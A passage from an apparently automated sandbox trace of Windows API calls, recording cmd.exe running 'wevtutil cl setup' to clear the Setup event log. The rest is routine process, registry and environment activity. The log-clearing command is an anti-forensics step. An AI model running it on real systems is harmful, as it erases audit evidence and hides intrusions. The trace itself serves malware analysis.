lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0x40, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x1, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.005] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0x1, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.005] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x0, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.005] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x9, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.005] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x9, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.005] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0x9, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.005] RegCloseKey (hKey=0x94) returned 0x0 [0095.005] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2980f [0095.005] srand (_Seed=0x5ad2980f) [0095.005] GetCommandLineW () returned="/c wevtutil cl setup" [0095.005] GetCommandLineW () returned="/c wevtutil cl setup" [0095.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.005] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fc9ca8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0095.005] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.005] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.005] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.005] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0095.005] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0095.005] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0095.005] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0095.005] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0095.005] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0095.005] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0095.005] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0095.005] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0095.005] GetEnvironmentStringsW () returned 0x4fc7d50* [0095.005] FreeEnvironmentStringsA (penv="A") returned 1 [0095.005] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.005] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.006] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0095.006] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0095.006] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0095.006] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0095.006] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0095.006] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0095.006] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0095.006] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0095.006] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4d2f590 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.006] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4d2f590, lpFilePart=0x4d2f588 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d2f588*="Desktop") returned 0x1d [0095.006] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.006] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4d2f310 | out: lpFindFileData=0x4d2f310) returned 0x4fc05c8 [0095.006] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0095.006] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4d2f310 | out: lpFindFileData=0x4d2f310) returned 0x4fc05c8 [0095.006] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0095.006] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0095.006] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4d2f310 | out: lpFindFileData=0x4d2f310) returned 0x4fc05c8 [0095.006] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0095.006] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.006] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0095.006] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0095.007] GetEnvironmentStringsW () returned 0x4fc7d50* [0095.007] FreeEnvironmentStringsA (penv="=") returned 1 [0095.007] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.007] GetConsoleOutputCP () returned 0x1b5 [0095.007] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.007] GetUserDefaultLCID () returned 0x409 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4d2f6c0, cchData=128 | out: lpLCData="0") returned 2 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4d2f6c0, cchData=128 | out: lpLCData="0") returned 2 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4d2f6c0, cchData=128 | out: lpLCData="1") returned 2 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0095.007] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0095.008] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0095.008] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0095.008] GetConsoleTitleW (in: lpConsoleTitle=0x4fca9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.009] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.009] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0095.009] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0095.009] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0095.009] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0095.009] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0095.009] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0095.009] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0095.009] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0095.009] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0095.009] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0095.010] GetConsoleTitleW (in: lpConsoleTitle=0x4d2f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.010] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0095.010] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0095.010] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0095.010] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0095.010] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0095.010] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0095.010] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0095.011] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0095.011] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0095.011] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0095.011] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0095.011] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0095.011] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0095.011] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0095.011] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0095.011] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0095.011] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0095.011] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0095.011] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0095.011] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0095.011] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0095.011] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0095.011] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0095.011] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0095.011] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0095.011] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0095.011] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0095.011] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0095.011] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0095.011] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0095.011] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0095.012] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0095.012] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0095.012] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0095.012] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0095.012] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0095.012] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0095.012] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0095.012] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0095.012] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0095.012] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0095.012] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0095.012] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0095.012] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0095.012] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0095.012] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0095.012] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0095.012] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0095.012] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0095.012] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0095.012] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0095.012] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0095.012] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0095.012] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0095.012] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0095.012] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0095.012] SetErrorMode (uMode=0x0) returned 0x0 [0095.012] SetErrorMode (uMode=0x1) returned 0x0 [0095.012] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4fcaec8, lpFilePart=0x4d2eeb4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d2eeb4*="Desktop") returned 0x1d [0095.013] SetErrorMode (uMode=0x0) returned 0x1 [0095.013] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.013] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0095.017] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.019] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x4d2ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d2ec40) returned 0xffffffff [0095.019] GetLastError () returned 0x2 [0095.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.019] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x4d2ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d2ec40) returned 0xffffffff [0095.019] GetLastError () returned 0x2 [0095.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.019] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x4d2ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d2ec40) returned 0x4fcb268 [0095.019] FindClose (in: hFindFile=0x4fcb268 | out: hFindFile=0x4fcb268) returned 1 [0095.019] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x4d2ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d2ec40) returned 0xffffffff [0095.019] GetLastError () returned 0x2 [0095.019] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x4d2ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d2ec40) returned 0x4fcb268 [0095.020] FindClose (in: hFindFile=0x4fcb268 | out: hFindFile=0x4fcb268) returned 1 [0095.020] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0095.020] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0095.020] GetConsoleTitleW (in: lpConsoleTitle=0x4d2f134, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.020] InitializeProcThreadAttributeList (in: lpAttributeList=0x4d2f060, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4d2f044 | out: lpAttributeList=0x4d2f060, lpSize=0x4d2f044) returned 1 [0095.020] UpdateProcThreadAttribute (in: lpAttributeList=0x4d2f060, dwFlags=0x0, Attribute=0x60001, lpValue=0x4d2f04c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4d2f060, lpPreviousValue=0x0) returned 1 [0095.020] GetStartupInfoW (in: lpStartupInfo=0x4d2f098 | out: lpStartupInfo=0x4d2f098*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0095.021] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0095.021] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0095.022] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl setup", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4d2efe8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl setup", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4d2f034 | out: lpCommandLine="wevtutil cl setup", lpProcessInformation=0x4d2f034*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9ec, dwThreadId=0xf0)) returned 1 [0095.027] CloseHandle (hObject=0xa4) returned 1 [0095.027] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0095.027] GetEnvironmentStringsW () returned 0x4fc9eb8* [0095.027] FreeEnvironmentStringsA (penv="=") returned 1 [0095.027] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0095.107] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4d2efcc | out: lpExitCode=0x4d2efcc*=0x0) returned 1 [0095.107] CloseHandle (hObject=0xa8) returned 1 [0095.107] _vsnwprintf (in: _Buffer=0x4d2f0b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4d2efd4 | out: _Buffer="00000000") returned 8 [0095.107] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0095.108] GetEnvironmentStringsW () returned 0x4fcb398* [0095.108] FreeEnvironmentStringsA (penv="=") returned 1 [0095.108] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0095.108] GetEnvironmentStringsW () returned 0x4fcb398* [0095.108] FreeEnvironmentStringsA (penv="=") returned 1 [0095.108] DeleteProcThreadAttributeList (in: lpAttributeList=0x4d2f060 | out: lpAttributeList=0x4d2f060) [0095.108] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.108] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.109] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.109] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.109] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.109] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.109] SetConsoleInputExeNameW () returned 0x1 [0095.109] GetConsoleOutputCP () returned 0x1b5 [0095.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.109] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.109] exit (_Code=0) Thread: id = 23 os_tid = 0x604 Process: id = "9" image_name = "conhost.exe" filename = 